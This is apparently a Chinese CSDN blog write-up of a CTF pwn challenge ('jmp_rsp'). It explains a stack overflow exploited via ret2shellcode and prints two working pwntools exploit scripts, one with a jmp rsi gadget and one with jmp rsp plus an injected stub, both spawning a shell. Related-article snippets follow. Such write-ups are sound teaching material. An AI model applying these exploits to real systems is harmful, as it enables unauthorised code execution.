【PWN · ret2shellcode | jmp rsp | jmp rsi】[广东省大学生攻防大赛 2022]jmp_rsp

已于 2024-03-05 09:20:10 修改
阅读量803 收藏 11
点赞数 4
分类专栏: 【PWN · Stack】 文章标签: pwn ctf ret2shellcode
于 2024-03-05 09:19:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/136468402
版权

这是一道非常简单的ret2shellcode,然而可以学到一些些小小的技巧。

目录

前言

一、题目概述

二、解题思路1

三、EXP1

四、解题思路2 

五、EXP2 

总结 

前言

ret2shellcode,一般是往某个wx属性的地方写上shellcode,再尝试进行控制流劫持,跳转到shellcode处。

一、题目概述

二、解题思路1

题目叫jmp rsp,是一个提示,但也可以是一种小误导。怎么说呢?

如果我们把shellcode写到buf,如何控制执行流到shellcode,是个难点。

程序是静态链接,有着丰富的gadget:

看到了jmp rsp。如果我们能让rsp指向shellcode处,执行跳转,就可以实现目的。然而如何让rsp-0x90,我并没有找到这样的gadget。

因此我开始关注其他寄存器的值——rsi在main函数ret时,指向了我们的buf——亦即shellcode!

于是非常简单。。。jmp rsi即可。 感觉略有些非预期。。

三、EXP1

from pwn import *

context(arch='amd64',log_level='debug')

# 0x000000000046d01d : jmp rsp
# 0x0000000000459a37 : jmp rsi

jmp_rsp=0x000000000046d01d
jmp_rsi=0x0000000000459a37
shellcode=asm(shellcraft.sh())

io=process('./pwn')
io=remote('node4.anna.nssctf.cn',28254)
# gdb.attach(io);input()
payload=shellcode.ljust(0x88,b'\x00')+p64(jmp_rsi)
# payload=b'the_buf_addr'
io.send(payload)
io.interactive()

四、解题思路2 

然而,当我翻阅大佬的wp时,发现jmp rsp确实也可以做。而这是因为我们可以不急于将控制流控制到shellcode处,而是更为灵活的,先将执行流劫持到可控制的栈上,而栈上的内容可由我们写,因此可以做很多事情。

试想,如果栈上这样布局:

------------------------------------------------------------------------------------
|          buf         |   rbp   |        ret        |            ... ...          |
------------------------------------------------------------------------------------
| shellcode    +       padding   |   gadget(jmp rsp) | asm(sub rsp, 0x90;jmp rsp)  |
------------------------------------------------------------------------------------

那么可以预料到的是:

1. 当ret的时候,rip被赋值,指向了当前的rsp所指向的值,即jmp rsp的gadget;同时rsp自减一个字。

2. 当程序继续执行,jmp rsp时,执行流被劫持到栈上,具体地址为ret的后一个字

3. 继续执行我们布置好的指令:rsp自减,指向buf开头,即shellcode开头。rip自动后移,指向jmp rsp

4. 继续执行,控制流jmp到rsp所指,buf的开头区域,顺利执行shellcode。

五、EXP2 

from pwn import *

context(arch='amd64',log_level='debug')

# 0x000000000046d01d : jmp rsp
# 0x0000000000459a37 : jmp rsi

jmp_rsp=0x000000000046d01d
jmp_rsi=0x0000000000459a37
shellcode=asm(shellcraft.sh())

io=process('./pwn')
# io=remote('node4.anna.nssctf.cn',28254)
# gdb.attach(io);input()
# payload=shellcode.ljust(0x88,b'\x00')+p64(jmp_rsi)
payload=shellcode.ljust(0x88,b'\x00')+p64(jmp_rsp)+asm('sub rsp,0x90;jmp rsp')
# payload=b'the_buf_addr'
io.send(payload)
io.interactive()

总结

题目并不难,没有套多少壳子,一眼漏洞。

然而利用技巧可以总结和掌握:

  1. 关注寄存器残留的值
  2. 利用rsp和栈可写可执行,能够做很多事情
Mr_Fmnwon
关注
专栏目录
pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 4817
pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击 简
[调试逆向] Linux内核PWN-ret2dir(附赠基础slub算法!)
ysxx188888的博客
03-13 380
利用的主要是这么个思想以及物理内存的情况,本题也是回忆起了很多内核PWN的基础知识点,算是慢慢抓起来了。
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
【广东大学生网络攻防大赛-WriteUp(非官方)】Pwn | jmp_rsp
ZXW_NUDT的博客
05-23 430
from pwn import * from ctypes import * from LibcSearcher import * context.log_level = 'debug' context.arch='amd64' io=remote('47.106.122.102',48752) rl=lambda a=False :io.recvline(a) ru=lambda a,b=True :io.recvuntil(a,b) rn=lambda x :io.sendline(x) sn=lamb
PWN · ret2shellcode | “jmp esp“】[i春秋]ret2shellcode
Mr_Fmnwon的博客
10-04 879
回顾ret2shellcode发现还有很多基础的技巧没有掌握。本题算是一个经典地、通过jmp esp将栈上的shellcode进行执行的题目。一、题目重述通过本例,掌握一个基础而常见的技巧:控制执行流到栈上指定位置开始执行。核心是利用了jmp esp 指令。
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 762
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
利用rsp进行shellcode跳转&&缩短shellcode&&csaw2018_shell_code
azraelxuemo的博客
04-04 512
文章目录csaw2018_shell_code题目分析题目保护漏洞攻击第一块的shellcode栈溢出的shellcodeallpayload 最近做了挺多这种缩短shellcode的题目,其实大概思想就是要利用现有的寄存器条件缩短shellcode,当然还是有一些基础的缩短shellcode的方法,用push pop来替换mov csaw2018_shell_code csaw2018_shell_code 题目分析 题目保护 栈可执行 漏洞 这两个地方可以填入shellcode 这里有个告诉栈地址
Linux pwn入门教程(2)——shellcode的使用,原理与变形
xiaoi123的博客
07-03 3920
作者:Tangerine@SAINTSEC0×00 shellcode的使用在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。然而在现实世界里并不是每个程序都有后门,即使是有,也没有那么好找。因此,我们就需要使用定制的shellcode来执行自己需要的操作。首先我们把演示程序~/Openctf 2016-tyro_shellcode1/t...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1545
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
NKCTF PWN wp
山高路远
03-30 634
NKCTF
[极客大挑战 2019]Not Bad刷题
qq_43766802的博客
09-28 529
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20大小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp,利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
某不知名ctfer选手的第三周周报
最新发布
2303_79366759的博客
05-22 1275
之前忘记和大家说了,就是在第二周周报的时候写了一个神秘的一题目,heap_uaf1和heap_uaf2忘记和你们说libc的版本和攻击原理了,其实这点在打堆题目的时候是很重要,之前我周报写的那个神秘的一题目就是打的glibc2.27的Tcache,那么现在我们来打一下fastbin这种题和Tcache的区别就是能改的少很多,和多了一个对size的检查机制。然后其他的利用手段都是和Tcache是差不多的,OK,下次给你们讲offbyone和offbynull。
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1208
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
NahamCon CTF 2022 pwn 部分writeup
z1r0的博客
05-02 1005
NahamCon CTF 2022 pwn writeup Babiersteps ret2text from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b
pwnable(echo1)【栈溢出shellcode模板】
九层台
01-25 726
这个题目可以作为一个栈溢出使用shellcode的模板,它除了给出栈溢出,关闭了NX和canary保护其他的什么都没有给。 这里的溢出,看一下它的上一级 输入1会执行它。 我的想法是没有地址我就找rop来泄露libc,或者栈的地址 但是看了一下没有能用的rop 换个思路,导入shellcode,用jmp esp指令作为跳转(这个可以作为导入shellcode的一种通用思路)。 查了一下en...
CTF 一次PWN解题的小技巧
军火库
08-09 460
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。
入门pwn-栈与栈溢出
xiaosolll的博客
10-05 593
栈 栈是计算机中一种先进后出的数据结构,先进入的数据进入(push)栈底,最后的数据在栈顶。当需要读取数据的时候从栈顶开始弹出(pop)数据。 进栈 Push 退栈 Pop 栈帧开辟详情 根据c语言常用调用协议 _cdecl协议。 函数从右向左传参。 32位程序用栈传参 64位是优先寄存器传参//6个以内RDI/RSI/RDX/RCX/R8/R9,六个使用完使用栈传参 #include<stdio.h> void func(int n,int m) { int c=0
skctf2020wp
qq_41252520的博客
06-08 373
Pwn 0x0 boring_canary 【保护】: 【分析】: 主要代码如下: 存在数组越界漏洞,可以通过v4避免覆写canary,然后就是常规的rop chain来getshell。然而主要问题是如何让scanf返回 -1,才能让程序执行我们的rop chain。我开始尝试输入负数,想通过修改V4的值来发生一些异常。当我输入 -3时,向 &v5[-24] 随意写入数据后程序果然异常了。为了一探究竟,开始进行调试。 我将断点打在 0x400761,输入 -3 然后向其写入任意数据,程序
BUUCTF刷题5
m0_51251108的博客
10-30 568
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值